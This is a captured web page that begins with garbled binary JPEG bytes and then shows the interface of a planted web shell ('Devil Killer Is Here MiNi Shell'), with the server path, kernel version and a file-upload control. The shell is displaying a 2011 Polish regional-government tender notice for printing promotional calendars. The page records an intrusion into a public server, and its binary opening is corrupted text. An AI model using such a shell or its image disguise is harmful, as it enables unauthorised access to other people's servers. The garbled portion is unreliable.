JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111007/264905-N-2011.html

<p class="kh_header"><b>Kielce: WYKONANIE KALENDARZY NA ROK 2012 PROMUJĄCYCH REGIONALNY PROGRAM OPERACYJNY WOJEWÓDZTWA ŚWIĘTOKRZYSKIEGO NA LATA 2007-2013, ORAZ O TEMATYCE EKOLOGICZNEJ</b><br>
<b>Numer ogłoszenia: 264905 - 2011; data zamieszczenia: 07.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego , al. IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 041 3443347, 3421549, 3421602, faks 041 3445265.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sejmik.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE KALENDARZY NA ROK 2012 PROMUJĄCYCH REGIONALNY PROGRAM OPERACYJNY WOJEWÓDZTWA ŚWIĘTOKRZYSKIEGO NA LATA 2007-2013, ORAZ O TEMATYCE EKOLOGICZNEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonawca musi opracować i wykonać na rzecz Zamawiającego terminarze, kalendarze na 2012 rok przy uwzględnieniu wytycznych zawartych w Załącznikach nr 1 i 2 do SIWZ. 
CZĘŚĆ I ZAMÓWIENIA
Wykonanie kalendarzy promujących Regionalny Program Operacyjny Województwa Świętokrzyskiego na lata 2007-2013.
Wykonawca zobowiązany będzie wykonać terminarze książkowe na 2011 rok, tj. notesowe oraz w formacie A4 i A5, a także kalendarze ścienne na 2011 rok: trójdzielne z kopertą i wieloplanszowe z kopertą w ilościach wskazanych poniżej, oraz w Załączniku nr 1 do SIWZ.
1. Terminarz notesowy - 1500 szt.
2. Terminarz formatu A4 - 300 szt. (jęz. angielski), 1200 szt. (jęz. polski)
3. Terminarz formatu A5 -1500 szt.
4. Kalendarz ścienny na rok 2012- trójdzielny z kopertą - 2500 szt.
5. Kalendarz ścienny na 2012 rok - wieloplanszowy  z kopertą - 2000 szt.
Dodatkowo w ramach świadczenia niniejszej usługi wykonawca będzie zobowiązany do naniesienia na terminarze i kalendarze zdjęć, napisów, herbów i logo zgodnie ze wskazaniami zamawiającego zawartymi w Załączniku nr 1 do SIWZ oraz w Księdze Identyfikacji Wizualnej Znaków NSS. Zamawiający wymaga, aby wykonane terminarze i kalendarze były kompletne, fabrycznie nowe oraz zgodne ze Szczegółowym Opisem Przedmiotu Zamówienia zamieszczonym w Załączniku nr 1 do SIWZ.
W ramach niniejszej usługi wykonawca będzie zobowiązany do przetłumaczenia na język angielski przekazanych przez zamawiającego tekstów, które zostaną zamieszczone w terminarzu formatu A4 (wersja angielska) i kalendarzu ściennym na 2011 rok - wieloplanszowy z kopertą, szczegółowo opisanych w pkt 2 i 5 Załącznika nr 1 do SIWZ. 
Ponadto, wykonawca będzie zobowiązany do współpracy z zamawiającym na etapie projektowania oraz wykonania przedmiotu zamówienia, w szczególności do dokonywania wszelkich ustaleń i uzgodnień. Zamawiający, w dniu zawarcia umowy w sprawie zamówienia publicznego, przekaże wykonawcy wyłonionemu do realizacji wszelkie materiały niezbędne do opracowania projektów terminarzy i kalendarzy, o których mowa w Załączniku nr 1 do SIWZ. W terminie 7 dni od dnia podpisania umowy wykonawca przedstawi zamawiającemu projekty kalendarzy. Zamawiający w terminie 3 dni od chwili przekazania projektów dokona
ich akceptacji lub przedstawi swoje uwagi i wskaże poprawki do uwzględnienia przez wykonawcę. 

CZĘŚĆ II ZAMÓWIENIA 
Wykonanie kalendarzy o tematyce ekologicznej
Wykonawca zobowiązany będzie wykonać na rzecz zamawiającego kalendarze na 2012 rok o tematyce ekologicznej, tj. kalendarze wieloplanszowe z kopertą w ilości wskazanej w Załączniku nr 2 do SIWZ - 500 szt. Dodatkowo w ramach świadczenia niniejszej usługi wykonawca będzie zobowiązany do naniesienia na kalendarze zdjęć i herbu Województwa Świętokrzyskiego zgodnie ze wskazaniami zamawiającego zawartymi w Załączniku nr 2 do SIWZ. Zamawiający wymaga, aby wykonane kalendarze były kompletne, fabrycznie nowe oraz zgodne ze Szczegółowym Opisem Przedmiotu Zamówienia zamieszczonym w Załączniku nr 2 do SIWZ.
Wykonawca będzie zobowiązany do współpracy z zamawiającym na etapie projektowania oraz wykonania przedmiotu zamówienia, w szczególności do dokonywania wszelkich ustaleń i uzgodnień. Zamawiający, w dniu zawarcia umowy w sprawie zamówienia publicznego, przekaże wykonawcy wyłonionemu do realizacji wszelkie materiały niezbędne do opracowania projektów kalendarzy, o których mowa w Załączniku nr 2 do SIWZ. W terminie 7 dni od dnia podpisania umowy wykonawca przedstawi zamawiającemu projekty kalendarzy. Zamawiający w terminie 3 dni od chwili przekazania projektów dokona ich akceptacji lub przedstawi swoje uwagi i wskaże poprawki do uwzględnienia przez wykonawcę.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9, 22.81.70.00-0, 30.19.97.92-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda wniesienia przez wykonawców wadium, którego wysokość ustalona została na kwotę:
-	I część zamówienia:4 000,00 złotych (słownie złotych: cztery tysiące 00/100)
-	II część zamówienia: 300,00 złotych (słownie złotych: trzysta 00/100)
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
3.	Wadium musi być wniesione przez wykonawców przed upływem terminu wyznaczonego do składania ofert. 
4.	W przypadku wnoszenia wadium w formie pieniądza liczy się termin wpływu środków na konto zamawiającego (moment uznania konta zamawiającego).
5.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego wg danych: 
-	Nazwa banku i nr konta zamawiającego: 
	Genin Noble Bank, 	45 1560 0013 2536 2450 5776 0005
-	Nazwa i adres zamawiającego:
Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego,   al. IX Wieków Kielc 3, 25-516 Kielce
-	Tytuł wpłaty: 
	Wadium - przetarg nieograniczony, OZNACZENIE CZĘŚCI ZAMÓWIENIA 6.	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
7.	Wadium wnoszone w formach, o których mowa w pkt 2 lit b - e musi wskazywać przedmiot zamówienia i zabezpieczać złożoną ofertę na cały okres, na jaki wykonawca jest związany ofertą, tj. na okres 30 dni licząc od dnia otwarcia ofert. Dokument taki musi zawierać zobowiązanie wypłacenia zamawiającemu przez poręczyciela lub gwaranta kwoty wadium w przypadkach, o których mowa w pkt 13 niniejszego rozdziału. Dokument może zostać złączony do oferty lub może zostać złożony w oddzielnej kopercie w siedzibie zamawiającego, pok. 146 przed upływem terminu wyznaczonego do składania ofert.
8.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy (pkt 13 niniejszego rozdziału).
9.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
10.	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11.	Zamawiający żądać będzie ponownego wniesienia wadium przez wykonawcę któremu zwrócono wadium na podstawie pkt. 8, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
12.	Wadium wniesione w pieniądzu zamawiający zwraca wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone 
o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. 
13.	Zamawiający zatrzymuje wadium wraz z odsetkami, w następujących przypadkach:
a)	jeżeli wykonawca w odpowiedzi na wezwanie zamawiającego, o którym mowa 
wart. 26 ust. 3 ustawy, nie złożył wymaganych dokumentów lub oświadczeń, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie,
b)	jeżeli wykonawca, którego oferta została wybrana:
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku Zamawiający wymaga aby Wykonawcy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie: - dla I części zamówienia - min. dwie usługi druku kalendarzy o wartościo wartości brutto nie mniejszej niż 50 000,00 złotych każda; - dla II części zamówienia - min. dwie usługi druku kalendarzy o wartości brutto nie mniejszej niż 5 000,00 złotych każda;
UWAGA:
1)	W przypadku składania oferty na więcej niż jedną część zamówienia wykonawcy mogą wykazać się wiedzą i doświadczeniem przy wykonaniu min. dwóch usług druku kalendarzy o wartości stanowiącej sumę kwot określonych dla wybranych części lub odrębnie po dwie usługi 
o wymaganych wartościach dla wybranych części zamówienia.
2)	W przypadku podania wartości danego zamówienia w walucie obcej, zamawiający dokona przeliczenia tej wartości na wartość w złotych według średniego kursu NBP dla danej waluty 
z dnia publikacji ogłoszenia o zamówieniu Biuletynie Zamówień Publicznych. Jeżeli w dniu ukazania się ogłoszenia o zamówieniu, NBP nie opublikuje informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń wg. średniego kursu z pierwszego, kolejnego dnia, w którym NBP opublikuje ww. informacje.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują odpowiednim
potencjałem technicznym. Zamawiający oceni spełnienie tego warunku według zasady
spełnia/nie spełnia, na podstawie Oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień
publicznych załączonego do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują osobami zdolnymi do
wykonania zamówienia. Zamawiający oceni spełnienie tego warunku według zasady spełnia/nie
spełnia, na podstawie Oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień publicznych
załączonego do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy znajdują się w sytuacji
ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Zamawiający oceni spełnienie tego warunku według zasady spełnia/nie spełnia, na podstawie Oświadczenia z art. 22 ust. 1
ustawy Prawo zamówień publicznych załączonego do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony Formularz oferty - wg wzoru określonego w dodatku nr 1 do SIWZ. 
2.	Wypełniony Formularz cenowy - wg wzoru określonego w dodatku nr 2A do SIWZ - dla części I zamówienia i lub 2B do SIWZ- dla części II zamówienia. 
3.	Wykonawca, który będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów (art. 26 ust. 2b) zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - oryginał podpisany przez podmiot.  

4.	W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawców występujących wspólnie (dotyczy również spółki cywilnej) - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (oryginał lub  poświadczona notarialnie kopia). 
5.	Pełnomocnictwo określające jego zakres - w przypadku gdy wykonawcę reprezentuje pełnomocnik (oryginał, poświadczona notarialnie kopia). 
6.	W przypadku wnoszenia wadium w formie niepieniężnej (rozdział VIII, pkt 2 lit. b - e SIWZ) - oryginał dokumentu potwierdzającego wniesienie przez wykonawcę wadium, 
w wymaganej wysokości. Oryginał dokumentu może zostać dołączony do oferty lub może zostać złożony w siedzibie zamawiającego, pok. 146, w oddzielnej kopercie, opisanej zgodnie z instrukcją zawartą w rozdziale X pkt 2 niniejszej SIWZ z dopiskiem WADIUM przed upływem terminu wyznaczonego do składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sejmik.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski
Województwa Świętokrzyskiego w Kielcach al. IX Wieków Kielc 3, 25-516 Kielce, Budynek C-2, pokój 345 (III
piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2011 godzina 12:00, miejsce: Urząd Marszałkowski Województwa Świętokrzyskiego w Kielcach, al. IX Wieków Kielc 3,
25-516 Kielce, Budynek C-2, pokój 146 (Kancelaria Ogólna, I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie (I część) jest współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013. OŚ PRIORYTETOWA 7 Pomoc Techniczna, DZIAŁANIE 7. 2 Działania informacyjne i promocyjne..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie kalendarzy na rok 2012 promujących Regionalny Program Operacyjny Województwa Świętokrzyskiego na lata 2007-2013..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązany będzie wykonać terminarze książkowe na 2011 rok, tj. notesowe oraz w formacie A4 i A5, a także kalendarze ścienne na 2011 rok: trójdzielne z kopertą i wieloplanszowe z kopertą w ilościach wskazanych poniżej, oraz w Załączniku nr 1 do SIWZ.
1.	Terminarz notesowy 	1 500 szt.
2.	Terminarz formatu A4	300 szt. (jęz. angielski), 
1 200 szt. (jęz. polski)
3.	Terminarz formatu A5 	1 500 szt.
4.	Kalendarz ścienny na rok 2012- trójdzielny z kopertą	
2 500 szt.
5.	Kalendarz ścienny na 2012 rok - wieloplanszowy  z kopertą	
2 000 szt.

Dodatkowo w ramach świadczenia niniejszej usługi wykonawca będzie zobowiązany do naniesienia na terminarze i kalendarze zdjęć, napisów, herbów i logo zgodnie ze wskazaniami zamawiającego zawartymi w Załączniku nr 1 do SIWZ oraz w Księdze Identyfikacji Wizualnej Znaków NSS. Zamawiający wymaga, aby wykonane terminarze i kalendarze były kompletne, fabrycznie nowe oraz zgodne ze Szczegółowym Opisem Przedmiotu Zamówienia zamieszczonym w Załączniku nr 1 do SIWZ.
W ramach niniejszej usługi wykonawca będzie zobowiązany do przetłumaczenia na język angielski przekazanych przez zamawiającego tekstów, które zostaną zamieszczone w terminarzu formatu A4 (wersja angielska) i kalendarzu ściennym na 2011 rok - wieloplanszowy z kopertą, szczegółowo opisanych w pkt 2 i 5 Załącznika nr 1 do SIWZ. 
Ponadto, wykonawca będzie zobowiązany do współpracy z zamawiającym na etapie projektowania oraz wykonania przedmiotu zamówienia, w szczególności do dokonywania wszelkich ustaleń i uzgodnień. Zamawiający, w dniu zawarcia umowy w sprawie zamówienia publicznego, przekaże wykonawcy wyłonionemu do realizacji wszelkie materiały niezbędne do opracowania projektów terminarzy i kalendarzy, o których mowa w Załączniku nr 1 do SIWZ. W terminie 7 dni od dnia podpisania umowy wykonawca przedstawi zamawiającemu projekty kalendarzy. Zamawiający w terminie 3 dni od chwili przekazania projektów dokona
ich akceptacji lub przedstawi swoje uwagi i wskaże poprawki do uwzględnienia przez wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9, 22.81.70.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie kalendarzy na 2012 rok o tematyce ekologicznej.</p>
